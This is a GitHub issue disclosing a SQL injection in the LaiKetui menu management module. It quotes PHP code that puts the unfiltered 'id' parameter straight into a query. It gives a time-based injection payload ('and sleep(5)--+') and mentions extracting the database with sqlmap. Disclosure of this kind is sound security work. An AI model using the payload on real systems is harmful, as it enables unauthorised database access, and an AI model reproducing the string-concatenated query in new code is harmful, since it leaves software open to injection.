Skip to content

SQL injection exists in the LaiKetui menu management function #13

New issue
New issue
Open
Open
SQL injection exists in the LaiKetui menu management function#13
@reclu3a

Description

@reclu3a
reclu3a
opened on Sep 11, 2021

SQL injection exists in the LaiKetui menu management function

image

The link where SQL injection exists is http://127.0.0.1/LaiKe/app/LKT/index.php?module=menu&action=modify&id=1

Locate the vulnerable file /app/LKT/webapp/modules/menu/actions/modifyAction.class.php

image

Because the parameter id is not filtered, it leads to SQL injection vulnerabilities

	public function getDefaultView() {
        $db = DBAction::getInstance();
        $request = $this->getContext()->getRequest();
        // 接收信息
        $id = $request->getParameter("id");
        $_SESSION['url'] = $_SERVER['HTTP_REFERER'];
        // 根据id,查询菜单
        $sql = "select * from lkt_core_menu where id = '$id'";
        $r_1 = $db->select($sql);
	public function getDefaultView() {
        $db = DBAction::getInstance();
        $request = $this->getContext()->getRequest();
        // 接收信息
        $id = $request->getParameter("id");
        $_SESSION['url'] = $_SERVER['HTTP_REFERER'];
        // 根据id,查询菜单
        $sql = "select * from lkt_core_menu where id = '$id'";
        $r_1 = $db->select($sql);

Use burpsuite to request url http://ceshi.io/laike/app/LKT/index.php?module=menu&action=modify&id=1' and sleep(5)--+

image

View SQL monitoring

image

Use sqlmap SQL injection
Get the database

image

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions